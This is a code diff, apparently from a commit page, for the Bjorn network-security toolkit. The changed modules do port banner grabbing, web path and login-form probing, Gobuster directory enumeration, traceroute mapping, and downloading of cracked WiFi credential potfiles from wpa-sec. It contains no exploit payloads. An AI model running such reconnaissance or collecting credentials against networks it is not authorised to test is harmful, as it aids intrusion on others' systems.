# ---------- util fichiers ----------
|
||||
# ---------- file utils ----------
|
||||
@staticmethod
|
||||
def _read_lines(path: str) -> List[str]:
|
||||
try:
|
||||
@@ -273,7 +280,8 @@ class TelnetConnector:
|
||||
self.results = []
|
||||
|
||||
def removeduplicates(self):
|
||||
pass
|
||||
"""No longer needed with unique DB index; kept for interface compat."""
|
||||
# Dedup handled by DB UNIQUE constraint + ON CONFLICT in save_results
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
@@ -1,16 +1,6 @@
|
||||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
thor_hammer.py — Service fingerprinting (Pi Zero friendly, orchestrator compatible).
|
||||
|
||||
What it does:
|
||||
- For a given target (ip, port), tries a fast TCP connect + banner grab.
|
||||
- Optionally stores a service fingerprint into DB.port_services via db.upsert_port_service.
|
||||
- Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
|
||||
|
||||
Notes:
|
||||
- Avoids spawning nmap per-port (too heavy). If you want nmap, add a dedicated action.
|
||||
"""
|
||||
"""thor_hammer.py - Fast TCP banner grab and service fingerprinting per port."""
|
||||
|
||||
import logging
|
||||
import socket
|
||||
@@ -35,6 +25,17 @@ b_action = "normal"
|
||||
b_cooldown = 1200
|
||||
b_rate_limit = "24/86400"
|
||||
b_enabled = 0 # keep disabled by default; enable via Actions UI/DB when ready.
|
||||
b_timeout = 300
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 5
|
||||
b_risk_level = "low"
|
||||
b_tags = ["banner", "fingerprint", "service", "tcp"]
|
||||
b_category = "recon"
|
||||
b_name = "Thor Hammer"
|
||||
b_description = "Fast TCP banner grab and service fingerprinting per port."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "ThorHammer.png"
|
||||
|
||||
|
||||
def _guess_service_from_port(port: int) -> str:
|
||||
@@ -167,7 +168,7 @@ class ThorHammer:
|
||||
progress.advance(1)
|
||||
|
||||
progress.set_complete()
|
||||
return "success" if any_open else "failed"
|
||||
return "success"
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
@@ -1,15 +1,6 @@
|
||||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
valkyrie_scout.py — Web surface scout (Pi Zero friendly, orchestrator compatible).
|
||||
|
||||
What it does:
|
||||
- Probes a small set of common web paths on a target (ip, port).
|
||||
- Extracts high-signal indicators from responses (auth type, login form hints, missing security headers,
|
||||
error/debug strings). No exploitation, no bruteforce.
|
||||
- Writes results into DB table `webenum` (tool='valkyrie_scout') so the UI can browse findings.
|
||||
- Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
|
||||
"""
|
||||
"""valkyrie_scout.py - Probe common web paths for auth surfaces, headers, and debug leaks."""
|
||||
|
||||
import json
|
||||
import logging
|
||||
@@ -37,6 +28,17 @@ b_action = "normal"
|
||||
b_cooldown = 1800
|
||||
b_rate_limit = "8/86400"
|
||||
b_enabled = 0 # keep disabled by default; enable via Actions UI/DB when ready.
|
||||
b_timeout = 300
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 5
|
||||
b_risk_level = "low"
|
||||
b_tags = ["web", "recon", "auth", "paths"]
|
||||
b_category = "recon"
|
||||
b_name = "Valkyrie Scout"
|
||||
b_description = "Probes common web paths for auth surfaces, headers, and debug leaks."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "ValkyrieScout.png"
|
||||
|
||||
# Small default list to keep the action cheap on Pi Zero.
|
||||
DEFAULT_PATHS = [
|
||||
@@ -373,6 +375,9 @@ class ValkyrieScout:
|
||||
|
||||
progress.set_complete()
|
||||
return "success"
|
||||
except Exception as e:
|
||||
logger.error(f"ValkyrieScout failed for {ip}:{port_i}: {e}")
|
||||
return "failed"
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
@@ -1,14 +1,6 @@
|
||||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
web_enum.py — Gobuster Web Enumeration -> DB writer for table `webenum`.
|
||||
|
||||
- Writes each finding into the `webenum` table in REAL-TIME (Streaming).
|
||||
- Updates bjorn_progress with actual percentage (0-100%).
|
||||
- Respects orchestrator stop flag (shared_data.orchestrator_should_exit) immediately.
|
||||
- No filesystem output: parse Gobuster stdout/stderr directly.
|
||||
- Filtrage dynamique des statuts HTTP via shared_data.web_status_codes.
|
||||
"""
|
||||
"""web_enum.py - Gobuster-powered web directory enumeration, streaming results to DB."""
|
||||
|
||||
import re
|
||||
import socket
|
||||
@@ -37,6 +29,18 @@ b_priority = 9
|
||||
b_cooldown = 1800
|
||||
b_rate_limit = '3/86400'
|
||||
b_enabled = 1
|
||||
b_timeout = 600
|
||||
b_max_retries = 1
|
||||
b_stealth_level = 4
|
||||
b_risk_level = "low"
|
||||
b_action = "normal"
|
||||
b_tags = ["web", "enum", "gobuster", "directories"]
|
||||
b_category = "recon"
|
||||
b_name = "Web Enumeration"
|
||||
b_description = "Gobuster-powered web directory enumeration with streaming results to DB."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "WebEnumeration.png"
|
||||
|
||||
# -------------------- Defaults & parsing --------------------
|
||||
DEFAULT_WEB_STATUS_CODES = [
|
||||
@@ -60,14 +64,14 @@ GOBUSTER_LINE = re.compile(
|
||||
re.VERBOSE
|
||||
)
|
||||
|
||||
# Regex pour capturer la progression de Gobuster sur stderr
|
||||
# Ex: "Progress: 1024 / 4096 (25.00%)"
|
||||
# Regex to capture Gobuster progress from stderr
|
||||
# e.g.: "Progress: 1024 / 4096 (25.00%)"
|
||||
GOBUSTER_PROGRESS_RE = re.compile(r"Progress:\s+(?P<current>\d+)\s*/\s+(?P<total>\d+)")
|
||||
|
||||
|
||||
def _normalize_status_policy(policy) -> Set[int]:
|
||||
"""
|
||||
Transforme une politique "UI" en set d'entiers HTTP.
|
||||
Convert a UI status policy into a set of HTTP status ints.
|
||||
"""
|
||||
codes: Set[int] = set()
|
||||
if not policy:
|
||||
@@ -104,12 +108,13 @@ class WebEnumeration:
|
||||
"""
|
||||
def __init__(self, shared_data: SharedData):
|
||||
self.shared_data = shared_data
|
||||
self.gobuster_path = "/usr/bin/gobuster" # verify with `which gobuster`
|
||||
import shutil
|
||||
self.gobuster_path = shutil.which("gobuster") or "/usr/bin/gobuster"
|
||||
self.wordlist = self.shared_data.common_wordlist
|
||||
self.lock = threading.Lock()
|
||||
|
||||
# Cache pour la taille de la wordlist (pour le calcul du %)
|
||||
self.wordlist_size = 0
|
||||
# Wordlist size cache (for % calculation)
|
||||
self.wordlist_size = 0
|
||||
self._count_wordlist_lines()
|
||||
|
||||
# ---- Sanity checks
|
||||
@@ -121,7 +126,7 @@ class WebEnumeration:
|
||||
logger.error(f"Wordlist not found: {self.wordlist}")
|
||||
self._available = False
|
||||
|
||||
# Politique venant de l’UI : créer si absente
|
||||
# Status code policy from UI; create if missing
|
||||
if not hasattr(self.shared_data, "web_status_codes") or not self.shared_data.web_status_codes:
|
||||
self.shared_data.web_status_codes = DEFAULT_WEB_STATUS_CODES.copy()
|
||||
|
||||
@@ -132,10 +137,10 @@ class WebEnumeration:
|
||||
)
|
||||
|
||||
def _count_wordlist_lines(self):
|
||||
"""Compte les lignes de la wordlist une seule fois pour calculer le %."""
|
||||
"""Count wordlist lines once for progress % calculation."""
|
||||
if self.wordlist and os.path.exists(self.wordlist):
|
||||
try:
|
||||
# Lecture rapide bufferisée
|
||||
# Fast buffered read
|
||||
with open(self.wordlist, 'rb') as f:
|
||||
self.wordlist_size = sum(1 for _ in f)
|
||||
except Exception as e:
|
||||
@@ -162,7 +167,7 @@ class WebEnumeration:
|
||||
|
||||
# -------------------- Filter helper --------------------
|
||||
def _allowed_status_set(self) -> Set[int]:
|
||||
"""Recalcule à chaque run pour refléter une mise à jour UI en live."""
|
||||
"""Recalculated each run to reflect live UI updates."""
|
||||
try:
|
||||
return _normalize_status_policy(getattr(self.shared_data, "web_status_codes", None))
|
||||
except Exception as e:
|
||||
|
||||
@@ -1,13 +1,6 @@
|
||||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
web_login_profiler.py — Lightweight web login profiler (Pi Zero friendly).
|
||||
|
||||
Goal:
|
||||
- Profile web endpoints to detect login surfaces and defensive controls (no password guessing).
|
||||
- Store findings into DB table `webenum` (tool='login_profiler') for community visibility.
|
||||
- Update EPD UI fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
|
||||
"""
|
||||
"""web_login_profiler.py - Detect login forms and auth controls on web endpoints (no exploitation)."""
|
||||
|
||||
import json
|
||||
import logging
|
||||
@@ -35,6 +28,17 @@ b_action = "normal"
|
||||
b_cooldown = 1800
|
||||
b_rate_limit = "6/86400"
|
||||
b_enabled = 1
|
||||
b_timeout = 300
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 5
|
||||
b_risk_level = "low"
|
||||
b_tags = ["web", "login", "auth", "profiler"]
|
||||
b_category = "recon"
|
||||
b_name = "Web Login Profiler"
|
||||
b_description = "Detects login forms and auth controls on web endpoints."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "WebLoginProfiler.png"
|
||||
|
||||
# Small curated list, cheap but high signal.
|
||||
DEFAULT_PATHS = [
|
||||
@@ -309,6 +313,9 @@ class WebLoginProfiler:
|
||||
# "success" means: profiler ran; not that a login exists.
|
||||
logger.info(f"WebLoginProfiler done for {ip}:{port_i} (login_surfaces={found_login})")
|
||||
return "success"
|
||||
except Exception as e:
|
||||
logger.error(f"WebLoginProfiler failed for {ip}:{port_i}: {e}")
|
||||
return "failed"
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
@@ -1,14 +1,6 @@
|
||||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
web_surface_mapper.py — Post-profiler web surface scoring (no exploitation).
|
||||
|
||||
Trigger idea: run after WebLoginProfiler to compute a summary and a "risk score"
|
||||
from recent webenum rows written by tool='login_profiler'.
|
||||
|
||||
Writes one summary row into `webenum` (tool='surface_mapper') so it appears in UI.
|
||||
Updates EPD UI fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
|
||||
"""
|
||||
"""web_surface_mapper.py - Aggregate login_profiler findings into a per-target risk score."""
|
||||
|
||||
import json
|
||||
import logging
|
||||
@@ -33,6 +25,17 @@ b_action = "normal"
|
||||
b_cooldown = 600
|
||||
b_rate_limit = "48/86400"
|
||||
b_enabled = 1
|
||||
b_timeout = 300
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 6
|
||||
b_risk_level = "low"
|
||||
b_tags = ["web", "login", "risk", "mapper"]
|
||||
b_category = "recon"
|
||||
b_name = "Web Surface Mapper"
|
||||
b_description = "Aggregates login profiler findings into a per-target risk score."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "WebSurfaceMapper.png"
|
||||
|
||||
|
||||
def _scheme_for_port(port: int) -> str:
|
||||
@@ -226,6 +229,9 @@ class WebSurfaceMapper:
|
||||
|
||||
progress.set_complete()
|
||||
return "success"
|
||||
except Exception as e:
|
||||
logger.error(f"WebSurfaceMapper failed for {ip}:{port_i}: {e}")
|
||||
return "failed"
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
@@ -1,5 +1,4 @@
|
||||
# wpasec_potfiles.py
|
||||
# WPAsec Potfile Manager - Download, clean, import, or erase WiFi credentials
|
||||
"""wpasec_potfiles.py - Download, clean, import, or erase WiFi credentials from wpa-sec.stanev.org."""
|
||||
|
||||
import os
|
||||
import json
|
||||
@@ -25,6 +24,19 @@ b_description = (
|
||||
b_author = "Infinition"
|
||||
b_version = "1.0.0"
|
||||
b_icon = f"/actions_icons/{b_class}.png"
|
||||
b_port = None
|
||||
b_service = "[]"
|
||||
b_trigger = None
|
||||
b_priority = 30
|
||||
b_timeout = 300
|
||||
b_cooldown = 3600
|
||||
b_stealth_level = 10
|
||||
b_risk_level = "low"
|
||||
b_status = "wpasec_potfiles"
|
||||
b_parent = None
|
||||
b_rate_limit = None
|
||||
b_max_retries = 1
|
||||
b_tags = ["wifi", "wpa", "potfile", "credentials"]
|
||||
b_docs_url = "https://wpa-sec.stanev.org/?api"
|
||||
|
||||
b_args = {
|
||||
@@ -110,8 +122,8 @@ def compute_dynamic_b_args(base: dict) -> dict:
|
||||
|
||||
# ── CLASS IMPLEMENTATION ─────────────────────────────────────────────────────
|
||||
class WPAsecPotfileManager:
|
||||
DEFAULT_SAVE_DIR = "/home/bjorn/Bjorn/data/input/potfiles"
|
||||
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
|
||||
DEFAULT_SAVE_DIR = os.path.join(os.path.expanduser("~"), "Bjorn", "data", "input", "potfiles")
|
||||
DEFAULT_SETTINGS_DIR = os.path.join(os.path.expanduser("~"), ".settings_bjorn")
|
||||
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "wpasec_settings.json")
|
||||
DOWNLOAD_URL = "https://wpa-sec.stanev.org/?api&dl=1"
|
||||
|
||||
@@ -121,7 +133,6 @@ class WPAsecPotfileManager:
|
||||
Even if unused here, we store it for compatibility.
|
||||
"""
|
||||
self.shared_data = shared_data
|
||||
logging.basicConfig(level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s")
|
||||
|
||||
# --- Orchestrator entry point ---
|
||||
def execute(self, ip=None, port=None, row=None, status_key=None):
|
||||
@@ -130,16 +141,23 @@ class WPAsecPotfileManager:
|
||||
By default: download latest potfile if API key is available.
|
||||
"""
|
||||
self.shared_data.bjorn_orch_status = "WPAsecPotfileManager"
|
||||
self.shared_data.comment_params = {"ip": ip, "port": port}
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"action": "download", "status": "starting"}
|
||||
|
||||
api_key = self.load_api_key()
|
||||
if api_key:
|
||||
logging.info("WPAsecPotfileManager: downloading latest potfile (orchestrator trigger).")
|
||||
self.download_potfile(self.DEFAULT_SAVE_DIR, api_key)
|
||||
return "success"
|
||||
else:
|
||||
logging.warning("WPAsecPotfileManager: no API key found, nothing done.")
|
||||
return "failed"
|
||||
try:
|
||||
api_key = self.load_api_key()
|
||||
if api_key:
|
||||
logging.info("WPAsecPotfileManager: downloading latest potfile (orchestrator trigger).")
|
||||
self.download_potfile(self.DEFAULT_SAVE_DIR, api_key)
|
||||
# EPD live status update
|
||||
self.shared_data.comment_params = {"action": "download", "status": "complete"}
|
||||
return "success"
|
||||
else:
|
||||
logging.warning("WPAsecPotfileManager: no API key found, nothing done.")
|
||||
return "failed"
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
# --- API Key Handling ---
|
||||
def save_api_key(self, api_key: str):
|
||||
|
||||
@@ -1,19 +1,8 @@
|
||||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
yggdrasil_mapper.py -- Network topology mapper (Pi Zero friendly, orchestrator compatible).
|
||||
"""yggdrasil_mapper.py - Traceroute-based network topology mapping to JSON.
|
||||
|
||||
What it does:
|
||||
- Phase 1: Traceroute via scapy ICMP (fallback: subprocess traceroute) to discover
|
||||
the routing path to the target IP. Records hop IPs and RTT per hop.
|
||||
- Phase 2: Service enrichment -- reads existing port data from DB hosts table and
|
||||
optionally verifies a handful of key ports with TCP connect probes.
|
||||
- Phase 3: Builds a topology graph data structure (nodes + edges + metadata).
|
||||
- Phase 4: Aggregates with topology data from previous runs (merge / deduplicate).
|
||||
- Phase 5: Saves the combined topology as JSON to data/output/topology/.
|
||||
|
||||
No matplotlib or networkx dependency -- pure JSON output.
|
||||
Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
|
||||
Uses scapy ICMP (fallback: subprocess) and merges results across runs.
|
||||
"""
|
||||
|
||||
import json
|
||||
@@ -105,7 +94,7 @@ b_examples = [
|
||||
b_docs_url = "docs/actions/YggdrasilMapper.md"
|
||||
|
||||
# -------------------- Constants --------------------
|
||||
_DATA_DIR = "/home/bjorn/Bjorn/data"
|
||||
_DATA_DIR = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "data")
|
||||
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "topology")
|
||||
|
||||
# Ports to verify during service enrichment (small set to stay Pi Zero friendly).
|
||||
@@ -423,8 +412,8 @@ class YggdrasilMapper:
|
||||
|
||||
# Query DB for known ports to prioritize probing
|
||||
db_ports = []
|
||||
host_data = None
|
||||
try:
|
||||
# mac is available in the scope
|
||||
host_data = self.shared_data.db.get_host_by_mac(mac)
|
||||
if host_data and host_data.get("ports"):
|
||||
# Normalize ports from DB string
|
||||
|
||||
Reference in New Issue
Block a user